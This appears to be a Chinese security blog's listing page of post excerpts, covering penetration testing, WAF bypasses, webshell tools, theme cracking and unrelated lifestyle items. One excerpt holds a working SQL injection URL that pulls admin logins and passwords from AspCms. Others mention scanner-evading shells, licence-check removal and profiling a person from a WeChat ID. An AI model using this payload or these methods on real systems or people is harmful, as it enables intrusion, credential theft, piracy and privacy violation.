主要关注网络安全方面的技术、知识和趋势,旨在为网络安全行业的发展做出贡献。
这款软件2014年上架的时候我就首发汉化了,但是当时很多bug,确实用起来很不方便。现在一年多时间洗礼,相信你也会喜欢这个功能强大的应用。…
0x00 前言最近,因为工作原因一直也没时间更新博客。好不容易忙完了一阵,眼看就要过年了,先提前祝大家新年快乐!很多时候,在看白帽子们的漏洞的时候总有一种感觉就是把web渗透简单地理解成了发现web系统漏洞进而获取webshell。其实,个人感觉一个完整的渗透(从黑客的角度去思考问题)应该是以尽一切可能获取目标的系统或者服务器的最高权限,尽可能的发现足够多的敏感信息。这个过程应该包括但不限于以下几个方面:信息刺探: 待渗透目标的系统,人员,组织信息…
【前言】 Wind Punish网络安全团队翻译部的第一部作品终于诞生了,我们选择了密码学中经典的漫画《Alice and Bob》,作为我们的第一个项目。 Alice和Bob这一对情侣,就像是学校里英文教科书中的李雷和韩梅梅一样,他们奇妙而平凡的生活,陪伴许多人走过了学习的历程,如果没有Alice和Bob, 你会在密码学教科书上看到这样的描述:A 与某个声称自己是 B 的人通信。为了确保无误,A 必须先看看 B 是否知道密码 K。因此 A 向 B 发送…
…
又是一个通宵,刚出去吃过早饭,视频教程也上传完毕。 一直说给各位来录制一个知更鸟begin主题的破解教程,但是一直没录制,前两天刚拿到最新版本的1.8版本主题包,正好有了原版主题包,所以就给各位录制一下,如何破解吧! 虽然1.8版本的主题增加了三个主题授权判断,但是不影响,旧版本的破解教程也是这样,只是去除了 后面的三个文件判断文件!!!! 视频是上传到乐视云点播里的,可能会出现转码后造成不清晰的问题,自己也观看了一边,的确有点不清晰,但是呢我博客里有文…
一、打开 www.weidian.com,注册一个“微店”的帐号。已有的可以直接登录。 二、申请开通一个微店。 三、点击左侧导航下方的【加入购物号】 四、点击【前往QQ购物号】,使用你的QQ登录。 五、根据自己的条件,选择对应的类型。个人和企业均可注册QQ购物号,所需资料和微信公众号基本一样。填写完资料,以后等待审核。
这里特别说明下这个版本和其他的版本的区别:1:支持微信连wifi的功能了,可以直接让用户自动选择关注微信公众号了。支持中文ssid 2:去掉了商户显示在线用户ip的功能,改为了显示在线用户是属于哪个路由器终端ID。可以在商户的路由管理处直接查看对应路由器,方便查询究竟我上网的用户是属于哪一个终端。测试截图: …
窗式、口号类广告的袭扰下,越来越多的用户对这类硬性广告产生反感的情绪,软文营销高性价比的优势逐渐凸显,对于网络营销来讲,不管是论坛营销、微博微信、博客营销,又或者是病毒式营销和事件营销,软文都以其非常强烈的指引式代入感渗透影响着用户的心理,一篇好的软文能引发用户自主购买、自发传播,产生裂变的效果。而一个好的软文营销高手,年薪百万不是梦想,你所需要的就是练就这些技能,成为一个高手。…
Burp已经成了绿帽子门必不可少的工具,相信大家都装有Java环境,本软件支持1.7+以及所有安装了环境的系统。1.6后续会考虑兼容。 一直都有想写一款真正实用的跨平台类似的菜刀,然后可惜代码是个渣渣一直可望而不可即,后续随着公司业务增多,大多数目标都有WAF,于是就想写一款完全脱离工具,只依靠配置文件的菜刀。顺便当个码农~~~ 前前后后大约花了一个月,除了打飞机的时间基本就在写这货了,这里要感谢@MelodyZX 牛,在我完成大体框架后,帮了我不少大忙,包括完成…
文中提及的部分技术、工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!Joomla是一套获得过多个奖项的内容管理系统(Content Management System,CMS),它采用PHP+MySQL数据库开发,可以运行在Linux、Windows、MacOSX、Solaris等多种平台上。除了具有新闻/文章管理、文档/图片管理、网站布局设置、模板/主题管理等一些基本功能外,还可以通过其提供的上千个插件进行功能扩展。同时它还支持多种语言,由于它的功能非常强大,…
核攻击,一个再熟悉不过的ID,混迹于各大组织论坛。名声在外,兴趣广泛,涉猎奇多本期我们采访了核攻击。核攻击,一个再熟悉不过的ID,混迹于各大组织论坛。名声在外,兴趣广泛,涉猎奇多。第一次被采访,第一次讲诉自己的经历,第一次讲诉对安全的认识。土司人物采访中的好多朋友都是第一次被采访,过去几期是这样,以后的采访也会是这样。本系列文章目的在于以技术大牛的自诉成长等形式给安全行业增加些我们的思考。…
黑客通过各种手段在只有一个微信号的情况下,得到此人姓名,年龄,性别,邮箱,Qq,Qq群,开过什么公司,电话号,之前用过的电话号,支付宝信息,常去网站,等等,虽然走了一些弯路,最终结果以及过程乌云黑客酒会'拿'走ip…
最近被开发者微博圈刷屏的Atom编辑器插件,插件效果图如下:<img src="http://image.3001.net/images/20151130/14488…
曾经在高二的时候认识一个日本妹子,朋友介绍的,长得很可爱,身高一米六左右……老家是北海道那边的, 她的声音甜甜的,轻柔不做作,爱笑,性格嘛,特别温柔,独处的时候像猫一样温顺,黏在身边,一起看电视聊聊天。性格还是有点害羞的,人多的时候也会不好意思,腼腆地笑笑, 皮肤很白,像雪,像北海道的雪。 妹子话不多,因为我听不懂太多深奥的日语……好在她的想法基本都写在脸上,盯着她看就能猜到她的心情。 …… 近距离看,长长的眼睫毛想让人亲一口。…
安全狗扫描过狗shell界面 …
admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1———————————————————————— Powered by AspCms2.0 未验证权…
…
依旧是multipart/form-data,去年的时候说道了利用PHP的特性去绕过WAF.轻松绕各种WAF的POST注入、跨站防御(比如安全狗) 原文简单的描述了PHP在处理POST请求的时候会解析multipart/form-data的内容。 那么这个multipart/form-data到底是个啥呢? …
GourdScan 之前俩个轮子中的一个的升级版,谈不上神器。 谈谈升级了哪些:1.更新了代理的方式,抛弃了占用内存极高的burp,采用了tornado进行代理,缺点是暂不支持https的代理。 2.更新了测试的逻辑,不会因为sqlmapapi的出错导致代理的挂起。 3.添加了分布式的支持,其实也就是通过mysql查询出正在运行任务最少的机器进…
资源超级合集【有各种设计软件.注册机…
…
先看个成品(新手制作,雕刻师傅轻喷) 自行在某宝上搜索 【红木料头】挺便宜的,不放连接,不做推广…